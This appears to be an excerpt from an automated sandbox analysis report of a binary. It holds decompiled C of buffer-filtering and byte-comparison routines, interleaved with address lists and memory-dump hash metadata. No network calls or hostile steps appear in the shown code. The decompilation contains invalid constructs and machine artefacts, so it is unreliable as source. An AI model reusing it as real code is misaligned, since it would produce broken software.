                                                                            					_t333 = __ecx[2];
                                                                            					 *(_t355 + 0x60) = _t215;
                                                                            					_t278 = _t215 - 3;
                                                                            					 *(_t355 + 0x28) = _t289;
                                                                            					 *(_t355 + 0x34) = _t278;
                                                                            					 *(_t355 + 0x3c) = _t333;
                                                                            					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
                                                                            						goto L98;
                                                                            					} else {
                                                                            						_t217 =  *__ecx;
                                                                            						 *(_t355 + 0x24) = _t217;
                                                                            						_t351 = _t217 + _t289;
                                                                            						_t218 = 0;
                                                                            						 *(_t355 + 0x14) = _t351;
                                                                            						_t319 = _t351 - _t278;
                                                                            						 *(_t355 + 0x1c) = 0;
                                                                            						 *(_t355 + 0x10) = _t319;
                                                                            						do {
                                                                            							_t279 = 0;
                                                                            							if(_t218 >= _t289) {
                                                                            								goto L67;
                                                                            							}
                                                                            							_t334 = _t319 + _t218;
                                                                            							_t320 =  *(_t355 + 0x60);
                                                                            							_t221 =  *(_t355 + 0x34) - _t351;
                                                                            							_t352 =  *(_t355 + 0x34);
                                                                            							 *(_t355 + 0x20) = _t221;
                                                                            							do {
                                                                            								if( &(_t334[_t221]) >= _t320) {
                                                                            									_t227 =  *_t334 & 0x000000ff;
                                                                            									_t291 =  *(_t334 - 3) & 0x000000ff;
                                                                            									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
                                                                            									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
                                                                            									 *(_t355 + 0x3c) = E001B4E62(_t320, _t227 - _t291 + _t279 - _t279);
                                                                            									 *(_t355 + 0x24) = E001B4E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
                                                                            									_t234 = E001B4E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
                                                                            									_t292 =  *((intOrPtr*)(_t355 + 0x44));
                                                                            									_t355 = _t355 + 0xc;
                                                                            									_t321 =  *(_t355 + 0x18);
                                                                            									if(_t292 > _t321 || _t292 > _t234) {
                                                                            										_t289 =  *(_t355 + 0x28);
                                                                            										_t320 =  *(_t355 + 0x60);
                                                                            										_t279 =  *(_t355 + 0x30);
                                                                            										if(_t321 > _t234) {
                                                                            											_t279 =  *(_t355 + 0x2c);
                                                                            										}
                                                                            									} else {
                                                                            										_t289 =  *(_t355 + 0x28);
                                                                            										_t320 =  *(_t355 + 0x60);
                                                                            									}
                                                                            								}
                                                                            								_t223 =  *(_t355 + 0x24);
                                                                            								_t279 = _t279 -  *_t223 & 0x000000ff;
                                                                            								 *(_t355 + 0x24) = _t223 + 1;
                                                                            								_t334[_t352] = _t279;
                                                                            								_t334 =  &(_t334[3]);
                                                                            								_t221 =  *(_t355 + 0x20);
                                                                            							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
                                                                            							_t351 =  *(_t355 + 0x14);
                                                                            							_t218 =  *(_t355 + 0x1c);
                                                                            							_t319 =  *(_t355 + 0x10);
                                                                            							L67:
                                                                            							_t218 = _t218 + 1;
                                                                            							 *(_t355 + 0x1c) = _t218;
                                                                            						} while (_t218 < 3);
                                                                            						_t335 =  *(_t355 + 0x3c);
                                                                            						_t290 = _t289 + 0xfffffffe;
                                                                            						while(_t335 < _t290) {
                                                                            							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
                                                                            							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
                                                                            							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
                                                                            							_t335 = _t335 + 3;
                                                                            						}
                                                                            						goto L15;
                                                                            					}
                                                                            				}
                                                                            				if(_t311 == 5) {
                                                                            					_t235 = __ecx[5];
                                                                            					_t293 =  *__ecx;
                                                                            					_t281 = __ecx[1];
                                                                            					 *(_t355 + 0x2c) = _t293;
                                                                            					 *(_t355 + 0x30) = _t235;
                                                                            					 *(_t355 + 0x38) = _t293 + _t235;
                                                                            					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
                                                                            						goto L98;
                                                                            					} else {
                                                                            						_t336 = 0;
                                                                            						 *(_t355 + 0x34) = 0;
                                                                            						if(_t281 == 0) {
                                                                            							goto L15;
                                                                            						} else {
                                                                            							goto L21;
                                                                            						}
                                                                            						do {
                                                                            							L21:
                                                                            							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
                                                                            							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
                                                                            							_t345 = 0;
                                                                            							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
                                                                            							_t353 = 0;
                                                                            							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
                                                                            							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
                                                                            							 *(_t355 + 0x1c) = 0;
                                                                            							E001AE920(_t336, _t355 + 0x40, 0, 0x1c);
                                                                            							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
                                                                            							_t355 = _t355 + 0xc;
                                                                            							 *(_t355 + 0x24) = _t336;
                                                                            							if(_t336 <  *(_t355 + 0x30)) {
                                                                            								_t238 =  *(_t355 + 0x60);
                                                                            								do {
                                                                            									_t322 =  *(_t355 + 0x1c);
                                                                            									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
                                                                            									_t297 =  *(_t355 + 0x2c);
                                                                            									 *(_t355 + 0x18) = _t322;
                                                                            									_t323 =  *_t297 & 0x000000ff;
                                                                            									 *(_t355 + 0x2c) =  &(_t297[1]);
                                                                            									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
                                                                            									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
                                                                            									_t349 = _t323 << 3;
                                                                            									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
                                                                            									 *(_t355 + 0x24) = _t304;
                                                                            									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E001B4E62(_t323, _t323 << 3);
                                                                            									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E001B4E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
                                                                            									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E001B4E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
                                                                            									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E001B4E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
                                                                            									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E001B4E62(_t323,  *(_t355 + 0x24) + _t349);
                                                                            									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E001B4E62(_t323, _t349 -  *(_t355 + 0x14));
                                                                            									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E001B4E62(_t323, _t349 +  *(_t355 + 0x14));
                                                                            									_t355 = _t355 + 0x1c;
                                                                            									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
                                                                            										_t345 =  *(_t355 + 0x10);
                                                                            										_t238 =  *(_t355 + 0x60);
                                                                            									} else {
                                                                            										_t324 =  *(_t355 + 0x40);
                                                                            										_t266 = 0;
                                                                            										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
                                                                            										_t308 = 1;
                                                                            										do {
                                                                            											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
                                                                            												_t324 =  *(_t355 + 0x40 + _t308 * 4);
                                                                            												_t266 = _t308;
                                                                            											}
                                                                            											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
                                                                            											_t308 = _t308 + 1;
                                                                            										} while (_t308 < 7);
                                                                            										_t345 =  *(_t355 + 0x10);
                                                                            										_t267 = _t266 - 1;
                                                                            										if(_t267 == 0) {
                                                                            											_t238 =  *(_t355 + 0x60);
                                                                            											if(_t353 >= 0xfffffff0) {
                                                                            												_t353 = _t353 - 1;
                                                                            											}
                                                                            											goto L49;
                                                                            										}
                                                                            										_t268 = _t267 - 1;
                                                                            										if(_t268 == 0) {
                                                                            											_t238 =  *(_t355 + 0x60);
                                                                            											if(_t353 < 0x10) {
                                                                            												_t353 = _t353 + 1;
                                                                            											}
                                                                            											goto L49;
                                                                            										}
                                                                            										_t269 = _t268 - 1;
                                                                            										if(_t269 == 0) {
                                                                            											_t238 =  *(_t355 + 0x60);
                                                                            											if(_t345 < 0xfffffff0) {
                                                                            												goto L49;
                                                                            											}
                                                                            											_t345 = _t345 - 1;
                                                                            											L43:
                                                                            											 *(_t355 + 0x10) = _t345;
                                                                            											goto L49;
                                                                            										}
                                                                            										_t270 = _t269 - 1;
                                                                            										if(_t270 == 0) {
                                                                            											_t238 =  *(_t355 + 0x60);
                                                                            											if(_t345 >= 0x10) {
                                                                            												goto L49;
                                                                            											}
                                                                            											_t345 = _t345 + 1;
                                                                            											goto L43;
                                                                            										}
                                                                            										_t271 = _t270 - 1;
                                                                            										if(_t271 == 0) {
                                                                            											_t238 =  *(_t355 + 0x60);
                                                                            											if(_t238 < 0xfffffff0) {
                                                                            												goto L49;
                                                                            											}
                                                                            											_t238 = _t238 - 1;
                                                                            											L36:
                                                                            											 *(_t355 + 0x60) = _t238;
                                                                            											goto L49;
                                                                            										}
                                                                            										_t238 =  *(_t355 + 0x60);
                                                                            										if(_t271 != 1 || _t238 >= 0x10) {
                                                                            											goto L49;
                                                                            										} else {
                                                                            											_t238 = _t238 + 1;
                                                                            											goto L36;
                                                                            										}
                                                                            									}
                                                                            									L49:
                                                                            									_t306 =  *(_t355 + 0x24) + _t281;
                                                                            									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
                                                                            									 *(_t355 + 0x24) = _t306;
                                                                            								} while (_t306 <  *(_t355 + 0x30));
                                                                            								_t336 =  *(_t355 + 0x34);
                                                                            							}
                                                                            							_t336 = _t336 + 1;
                                                                            							 *(_t355 + 0x34) = _t336;
                                                                            						} while (_t336 < _t281);
                                                                            						goto L15;
                                                                            					}
                                                                            				}
                                                                            				if(_t311 != 6) {
                                                                            					goto L15;
                                                                            				}
                                                                            				_t309 = __ecx[5];
                                                                            				_t354 = 0;
                                                                            				_t325 = __ecx[1];
                                                                            				 *(_t355 + 0x28) = _t309;
                                                                            				 *(_t355 + 0x60) = _t309 + _t309;
                                                                            				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
                                                                            					goto L98;
                                                                            				} else {
                                                                            					_t274 = _t325;
                                                                            					 *(_t355 + 0x24) = _t325;
                                                                            					do {
                                                                            						_t282 = 0;
                                                                            						_t338 = _t309;
                                                                            						if(_t309 <  *(_t355 + 0x60)) {
                                                                            							_t310 =  *(_t355 + 0x60);
                                                                            							goto L12;
                                                                            							L12:
                                                                            							_t275 =  *_t339;
                                                                            							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
                                                                            							_t354 = _t354 + 1;
                                                                            							 *((char*)(_t275 + _t338)) = _t282;
                                                                            							_t338 = _t338 + _t325;
                                                                            							if(_t338 < _t310) {
                                                                            								goto L12;
                                                                            							} else {
                                                                            								_t309 =  *(_t355 + 0x28);
                                                                            								_t274 =  *(_t355 + 0x24);
                                                                            								goto L14;
                                                                            							}
                                                                            						}
                                                                            						L14:
                                                                            						_t309 = _t309 + 1;
                                                                            						_t274 = _t274 - 1;
                                                                            						 *(_t355 + 0x28) = _t309;
                                                                            						 *(_t355 + 0x24) = _t274;
                                                                            					} while (_t274 != 0);
                                                                            					goto L15;
                                                                            				}
                                                                            			}
                                                                            0x0019bd74
                                                                            0x0019bd10
                                                                            0x0019bd13
                                                                            0x0019bd61
                                                                            0x0019bd68
                                                                            0x0019bd6a
                                                                            0x0019bd6a
                                                                            0x00000000
                                                                            0x0019bd68
                                                                            0x0019bd15
                                                                            0x0019bd18
                                                                            0x0019bd51
                                                                            0x0019bd58
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019bd5a
                                                                            0x0019bd5b
                                                                            0x0019bd5b
                                                                            0x00000000
                                                                            0x0019bd5b
                                                                            0x0019bd1a
                                                                            0x0019bd1d
                                                                            0x0019bd45
                                                                            0x0019bd4c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019bd4e
                                                                            0x00000000
                                                                            0x0019bd4e
                                                                            0x0019bd1f
                                                                            0x0019bd22
                                                                            0x0019bd39
                                                                            0x0019bd40
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019bd42
                                                                            0x0019bd33
                                                                            0x0019bd33
                                                                            0x00000000
                                                                            0x0019bd33
                                                                            0x0019bd27
                                                                            0x0019bd2b
                                                                            0x00000000
                                                                            0x0019bd32
                                                                            0x0019bd32
                                                                            0x00000000
                                                                            0x0019bd32
                                                                            0x0019bd2b
                                                                            0x0019bd81
                                                                            0x0019bd85
                                                                            0x0019bd87
                                                                            0x0019bd8b
                                                                            0x0019bd8f
                                                                            0x0019bd99
                                                                            0x0019bd99
                                                                            0x0019bd9d
                                                                            0x0019bd9e
                                                                            0x0019bda2
                                                                            0x00000000
                                                                            0x0019bdaa
                                                                            0x0019bb9e
                                                                            0x0019bb09
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019bb0b
                                                                            0x0019bb0e
                                                                            0x0019bb10
                                                                            0x0019bb13
                                                                            0x0019bb1a
                                                                            0x0019bb24
                                                                            0x00000000
                                                                            0x0019bb3e
                                                                            0x0019bb3e
                                                                            0x0019bb40
                                                                            0x0019bb44
                                                                            0x0019bb44
                                                                            0x0019bb46
                                                                            0x0019bb4c
                                                                            0x0019bb4e
                                                                            0x0019bb4e
                                                                            0x0019bb52
                                                                            0x0019bb52
                                                                            0x0019bb54
                                                                            0x0019bb57
                                                                            0x0019bb58
                                                                            0x0019bb5b
                                                                            0x0019bb5f
                                                                            0x00000000
                                                                            0x0019bb61
                                                                            0x0019bb61
                                                                            0x0019bb65
                                                                            0x00000000
                                                                            0x0019bb65
                                                                            0x0019bb5f
                                                                            0x0019bb69
                                                                            0x0019bb69
                                                                            0x0019bb6a
                                                                            0x0019bb6d
                                                                            0x0019bb71
                                                                            0x0019bb71
                                                                            0x00000000
                                                                            0x0019bb44

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd46deb4285285989253233ffcd0501befac4f2e2947556a3391bdd28ca9c2de
                                                                            • Instruction ID: e6df89aa5a41209b59b5452502438253f981e3a09dedd7790ca4d3391637979e
                                                                            • Opcode Fuzzy Hash: cd46deb4285285989253233ffcd0501befac4f2e2947556a3391bdd28ca9c2de
                                                                            • Instruction Fuzzy Hash: 87F18871A083418FCB18CE29D6C456ABBE6FBD9318F184A2EF4C687255D734E905CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001B0113(void* __edx, void* __esi) {
                                                                            				signed int _t192;
                                                                            				signed char _t193;
                                                                            				signed char _t194;
                                                                            				signed char _t195;
                                                                            				signed char _t196;
                                                                            				signed char _t198;
                                                                            				signed int _t241;
                                                                            				void* _t287;
                                                                            				void* _t292;
                                                                            				void* _t294;
                                                                            				void* _t296;
                                                                            				void* _t298;
                                                                            				void* _t300;
                                                                            				void* _t302;
                                                                            				void* _t304;
                                                                            				void* _t306;
                                                                            				void* _t308;
                                                                            				void* _t310;
                                                                            				void* _t312;
                                                                            				void* _t314;
                                                                            				void* _t316;
                                                                            				void* _t318;
                                                                            				void* _t320;
                                                                            				void* _t322;
                                                                            				void* _t324;
                                                                            				void* _t326;
                                                                            				void* _t327;
                                                                            
                                                                            				_t327 = __esi;
                                                                            				_t287 = __edx;
                                                                            				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                                                            					_t241 = 0;
                                                                            					L15:
                                                                            					if(_t241 != 0) {
                                                                            						goto L2;
                                                                            					}
                                                                            					_t193 =  *(_t327 - 0x1a);
                                                                            					if(_t193 ==  *(_t287 - 0x1a)) {
                                                                            						_t241 = 0;
                                                                            						L26:
                                                                            						if(_t241 != 0) {
                                                                            							goto L2;
                                                                            						}
                                                                            						_t194 =  *(_t327 - 0x16);
                                                                            						if(_t194 ==  *(_t287 - 0x16)) {
                                                                            							_t241 = 0;
                                                                            							L37:
                                                                            							if(_t241 != 0) {
                                                                            								goto L2;
                                                                            							}
                                                                            							_t195 =  *(_t327 - 0x12);
                                                                            							if(_t195 ==  *(_t287 - 0x12)) {
                                                                            								_t241 = 0;
                                                                            								L48:
                                                                            								if(_t241 != 0) {
                                                                            									goto L2;
                                                                            								}
                                                                            								_t196 =  *(_t327 - 0xe);
                                                                            								if(_t196 ==  *(_t287 - 0xe)) {
                                                                            									_t241 = 0;
                                                                            									L59:
                                                                            									if(_t241 != 0) {
                                                                            										goto L2;
                                                                            									}
                                                                            									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                                                            										_t241 = 0;
                                                                            										L70:
                                                                            										if(_t241 != 0) {
                                                                            											goto L2;
                                                                            										}
                                                                            										_t198 =  *(_t327 - 6);
                                                                            										if(_t198 ==  *(_t287 - 6)) {
                                                                            											_t241 = 0;
                                                                            											L81:
                                                                            											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                                                            											}
                                                                            											goto L2;
                                                                            										}
                                                                            										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                                                            										if(_t292 == 0) {
                                                                            											L74:
                                                                            											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                                                            											if(_t294 == 0) {
                                                                            												L76:
                                                                            												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                                                            												if(_t296 == 0) {
                                                                            													L78:
                                                                            													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                                                            													if(_t241 != 0) {
                                                                            														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            													}
                                                                            													goto L81;
                                                                            												}
                                                                            												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                            												if(_t241 != 0) {
                                                                            													goto L2;
                                                                            												}
                                                                            												goto L78;
                                                                            											}
                                                                            											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                            											if(_t241 != 0) {
                                                                            												goto L2;
                                                                            											}
                                                                            											goto L76;
                                                                            										}
                                                                            										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                            										if(_t241 != 0) {
                                                                            											goto L2;
                                                                            										}
                                                                            										goto L74;
                                                                            									}
                                                                            									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                                                            									if(_t298 == 0) {
                                                                            										L63:
                                                                            										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                                                            										if(_t300 == 0) {
                                                                            											L65:
                                                                            											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                                                            											if(_t302 == 0) {
                                                                            												L67:
                                                                            												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                                                            												if(_t241 != 0) {
                                                                            													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            												}
                                                                            												goto L70;
                                                                            											}
                                                                            											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                            											if(_t241 != 0) {
                                                                            												goto L2;
                                                                            											}
                                                                            											goto L67;
                                                                            										}
                                                                            										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                            										if(_t241 != 0) {
                                                                            											goto L2;
                                                                            										}
                                                                            										goto L65;
                                                                            									}
                                                                            									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                            									if(_t241 != 0) {
                                                                            										goto L2;
                                                                            									}
                                                                            									goto L63;
                                                                            								}
                                                                            								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                                                            								if(_t304 == 0) {
                                                                            									L52:
                                                                            									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                                                            									if(_t306 == 0) {
                                                                            										L54:
                                                                            										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                                                            										if(_t308 == 0) {
                                                                            											L56:
                                                                            											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                                                            											if(_t241 != 0) {
                                                                            												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            											}
                                                                            											goto L59;
                                                                            										}
                                                                            										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                            										if(_t241 != 0) {
                                                                            											goto L2;
                                                                            										}
                                                                            										goto L56;
                                                                            									}
                                                                            									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                            									if(_t241 != 0) {
                                                                            										goto L2;
                                                                            									}
                                                                            									goto L54;
                                                                            								}
                                                                            								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                            								if(_t241 != 0) {
                                                                            									goto L2;
                                                                            								}
                                                                            								goto L52;
                                                                            							}
                                                                            							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                                                            							if(_t310 == 0) {
                                                                            								L41:
                                                                            								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                                                            								if(_t312 == 0) {
                                                                            									L43:
                                                                            									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                                                            									if(_t314 == 0) {
                                                                            										L45:
                                                                            										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                                                            										if(_t241 != 0) {
                                                                            											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            										}
                                                                            										goto L48;
                                                                            									}
                                                                            									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                                                            									if(_t241 != 0) {
                                                                            										goto L2;
                                                                            									}
                                                                            									goto L45;
                                                                            								}
                                                                            								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                            								if(_t241 != 0) {
                                                                            									goto L2;
                                                                            								}
                                                                            								goto L43;
                                                                            							}
                                                                            							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                            							if(_t241 != 0) {
                                                                            								goto L2;
                                                                            							}
                                                                            							goto L41;
                                                                            						}
                                                                            						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                                                            						if(_t316 == 0) {
                                                                            							L30:
                                                                            							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                                                            							if(_t318 == 0) {
                                                                            								L32:
                                                                            								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                                                            								if(_t320 == 0) {
                                                                            									L34:
                                                                            									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                                                            									if(_t241 != 0) {
                                                                            										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            									}
                                                                            									goto L37;
                                                                            								}
                                                                            								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                                                            								if(_t241 != 0) {
                                                                            									goto L2;
                                                                            								}
                                                                            								goto L34;
                                                                            							}
                                                                            							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                                                            							if(_t241 != 0) {
                                                                            								goto L2;
                                                                            							}
                                                                            							goto L32;
                                                                            						}
                                                                            						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                                                            						if(_t241 != 0) {
                                                                            							goto L2;
                                                                            						}
                                                                            						goto L30;
                                                                            					}
                                                                            					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                                                            					if(_t322 == 0) {
                                                                            						L19:
                                                                            						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                                                            						if(_t324 == 0) {
                                                                            							L21:
                                                                            							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                                                            							if(_t326 == 0) {
                                                                            								L23:
                                                                            								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                                                            								if(_t241 != 0) {
                                                                            									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L26;
                                                                            							}
                                                                            							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                                                            							if(_t241 != 0) {
                                                                            								goto L2;
                                                                            							}
                                                                            							goto L23;
                                                                            						}
                                                                            						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                                                            						if(_t241 != 0) {
                                                                            							goto L2;
                                                                            						}
                                                                            						goto L21;
                                                                            					}
                                                                            					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                                                            					if(_t241 != 0) {
                                                                            						goto L2;
                                                                            					}
                                                                            					goto L19;
                                                                            				} else {
                                                                            					__edi = __al & 0x000000ff;
                                                                            					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                            					if(__edi == 0) {
                                                                            						L8:
                                                                            						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                            						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                            						if(__edi == 0) {
                                                                            							L10:
                                                                            							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                            							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                            							if(__edi == 0) {
                                                                            								L12:
                                                                            								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                                                            								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                            								if(__ecx != 0) {
                                                                            									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                            								}
                                                                            								goto L15;
                                                                            							}
                                                                            							0 = 0 | __edi > 0x00000000;
                                                                            							__ecx = (__edi > 0) * 2 != 1;
                                                                            							if((__edi > 0) * 2 != 1) {
                                                                            								L2:
                                                                            								_t192 = _t241;
                                                                            								return _t192;
                                                                            							}
                                                                            							goto L12;
                                                                            						}
                                                                            						0 = 0 | __edi > 0x00000000;
                                                                            						__ecx = (__edi > 0) * 2 != 1;
                                                                            						if((__edi > 0) * 2 != 1) {
                                                                            							goto L2;
                                                                            						}
                                                                            						goto L10;
                                                                            					}
                                                                            					0 = 0 | __edi > 0x00000000;
                                                                            					__ecx = (__edi > 0) * 2 != 1;
                                                                            					if((__edi > 0) * 2 != 1) {
                                                                            						goto L2;
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            			}






























                                                                            0x001b0223
                                                                            0x001b0225
                                                                            0x001b022e
                                                                            0x001b022e
                                                                            0x00000000
                                                                            0x001b0225
                                                                            0x001b020c
                                                                            0x001b0215
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b0215
                                                                            0x001b01ea
                                                                            0x001b01f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b01f3
                                                                            0x001b01c8
                                                                            0x001b01d1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b011f
                                                                            0x001b011f
                                                                            0x001b0126
                                                                            0x001b0128
                                                                            0x001b0140
                                                                            0x001b0140
                                                                            0x001b0148
                                                                            0x001b014a
                                                                            0x001b0162
                                                                            0x001b0162
                                                                            0x001b016a
                                                                            0x001b016c
                                                                            0x001b0184
                                                                            0x001b0184
                                                                            0x001b018c
                                                                            0x001b018e
                                                                            0x001b0197
                                                                            0x001b0197
                                                                            0x00000000
                                                                            0x001b018e
                                                                            0x001b0172
                                                                            0x001b0175
                                                                            0x001b017e
                                                                            0x001afcd6
                                                                            0x001afcd6
                                                                            0x001b0ac7
                                                                            0x001b0ac7
                                                                            0x00000000
                                                                            0x001b017e
                                                                            0x001b0150
                                                                            0x001b0153
                                                                            0x001b015c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b015c
                                                                            0x001b012e
                                                                            0x001b0131
                                                                            0x001b013a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b013a

                                                                            Memory Dump Source
